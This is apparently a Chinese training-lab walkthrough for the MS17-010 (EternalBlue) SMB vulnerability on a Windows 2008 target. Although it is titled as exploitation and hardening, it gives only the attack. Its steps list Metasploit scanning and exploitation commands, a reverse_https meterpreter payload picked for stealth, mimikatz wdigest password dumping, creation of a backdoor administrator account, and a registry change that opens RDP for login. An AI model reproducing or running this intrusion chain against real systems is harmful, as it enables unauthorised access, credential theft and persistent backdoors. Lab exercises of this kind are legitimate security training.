操作系统漏洞验证及加固-MS17_010漏洞利用与安全加固

任务环境说明：

服务器场景：Kali Linux（用户名：root；密码：toor） 服务器场景：Microsoft Windows2008 Server（用户名：administrator；密码：P@ssw0rd）

第一步，打开网络拓扑，点击启动选项，启动实验虚拟机

第二步，使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址，使用ping命令进行网络连通性测试，确保网络可达

渗透机ip地址172.16.1.10

靶机ip地址172.16.1.4

第三步，使用命令msfconsole启动metasploit渗透测试平台

第四步，使用命令search搜索msf模块auxiliary/scanner/smb/smb_ms17_010验证目标靶机是否存在此漏洞

第五步，使用命令use auxiliary/scanner/smb/smb_ms17_010来调用漏洞扫描检测模块

show options查看需要配置的参数

使用命令set RHOSTS设置靶机地址，使用exploit或者run命令运行扫描模块

第六步，通过扫描发现目标靶机存在MS17-010漏洞，下一步使用use命令调用exploit/windwos /smb/ms17_010_eternalblue漏洞利用模块，然后使用show options命令查看配置参数，并对目标靶机地址进行设置

第七步，使用命令set PAYLOAD 设置一个攻击载荷模块，这里我们使用HTTPS协议的meterpreter反弹载荷windows/x64/meterpreter/reverse_https更不易察觉

第八步，使用命令show options查看载荷模块需要配置的参数

使用命令set RHOST 设置目标靶机地址

使用命令set LHOST设置本地反弹连接的地址

然后使用命令run或者exploit来运行该模块

第九步，使用命令sysinfo来查看目标靶机信息

第十步，使用命令Load mimikatz 来加载口令获取模块，然后使用命令wdigest来获取管理员密码

第十一步，使用命令shell启动meterpreter下cmd的shell终端，然后使用命令ipconfig查看当前网卡的信息，

输入命令whoami来查看当前的系统权限

第十二步，使用命令net user 账户名 密码 /add添加账户，然后进行提权

使用命令net localgroup administrators 后门用户 /add ,将后门用户提升为管理员权限

第十三步，使用命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启3389端口：

第十四步，使用命令rdesktop启动远程桌面连接终端，并使用后门用户进行登录

登录后门用户，成功渗透